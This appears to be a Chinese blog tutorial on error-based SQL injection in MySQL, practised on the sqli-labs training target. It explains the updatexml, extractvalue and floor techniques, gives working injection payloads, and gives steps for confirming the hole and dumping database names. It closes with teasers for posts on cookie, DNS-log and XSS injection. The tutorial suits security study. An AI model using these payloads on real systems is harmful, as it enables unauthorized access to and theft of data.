滲透測試 報錯注入

2021-10-06 08:37:59 字數 2153 閱讀 3967

由於後台沒有對資料庫的資訊做過濾,會輸出到前台顯示,那麼我們就可以通過製造報錯函式,將查詢語句帶入到資料庫中,以報錯資訊顯示出來。

1)引數使用者可控:前端傳入的引數內容由使用者控制

2)引數帶入資料庫的查詢:傳入的引數拼接到 sql 語句,並且帶入資料庫的查詢

3)對使用者輸入的資料沒有做合法性的判斷

4)後台對資料庫的資訊沒做過濾,會輸出到前台顯示

extractvalue\updatexml\floor\exp
updatexml函式的第二個引數應當是填寫規範的xpath路徑,當使用者在這個欄位中使用concat函式時,cancat函式會將它所執行的sql查詢結果和報錯資訊進行拼接。這就是updatexml的攻擊注入原理

extractvalue函式第二個引數 xml中的位置是可操作的地方,xml文件中查詢字元位置是用 /***/***/***/…這種格式,如果我們寫入其他格式,就會報錯,並且會返回我們寫入的非法格式內容,而這個非法的內容就是我們想要查詢的內容。

floor報錯注入準確地說應該是floor,count,group by衝突報錯,是當這三個函式在特定情況一起使用產生的錯誤。

updatexml():id=1』 and updatexml(1,concat(0x7e,(database()),0x7e),1) --+

extractvalue():id=1』 and extractvalue(1,concat(』~』,(select database())))–+

floor():id=1』 and select count(*),(concat(floor(rand(0)*2),(select database())))x from users group by x --+

對頁面進行報錯注入,查詢到使用者資訊

環境:sqli靶場

第一步:判斷是否存在報錯注入漏洞

1.?id=1』 錯誤

2.?id=1 and 1=1 返回正常結果

3.?id=1 and 1=2 返回正常這裡可以判斷是字元型,那麼構造字元型注入的payload

2.?id=1』 and 1=1 --+ 正常

3.?id=1』 and 1=2 --+ 異常

從而可以判斷此處存在sql注入漏洞,切注入漏洞型別為字元型

異常後會顯示報錯資訊到頁面

第二步:爆庫名

第三步:爆表名

第四步:爆欄位

第五步:爆資料

滲透測試 cookie注入

cookie最先是由netscape 網景 公司提出的,netscape官方文件中對cookie的定義是這樣的 cookie是在http協議下,伺服器或指令碼可以維護客戶工作站上資訊的一種方式。cookie的用途非常廣泛,在網路中經常可以見到cookie的身影。它通常被用來辨別使用者身份 進行ses...

滲透測試(四)DNS log注入

測試靶場 掌控安全學院靶場 明白dns原理,知道網域名稱解析時網域名稱伺服器會記錄log,但在別人伺服器上我們看不到該log,則找工具 dnslog.cn 或者 ceye.io 上去回顯出我們想要的資料 以mysql為例,構造注入語句,以load file 函式配合dns log得到資料 mysql...

滲透測試 web安全 XSS注入

儲存型xss 反射型xss dom型xss alert xss 黑客通過郵件或聊天工具給目標傳送攜帶xss指令碼的鏈結 使用者訪問鏈結 瀏覽器請求資料 伺服器將攜帶xss注入的資料寫入到相應頁面返回資料 瀏覽器渲染返回的資料觸發對應的xss 注意事項 主要通過構造xss鏈結 例 localhost ...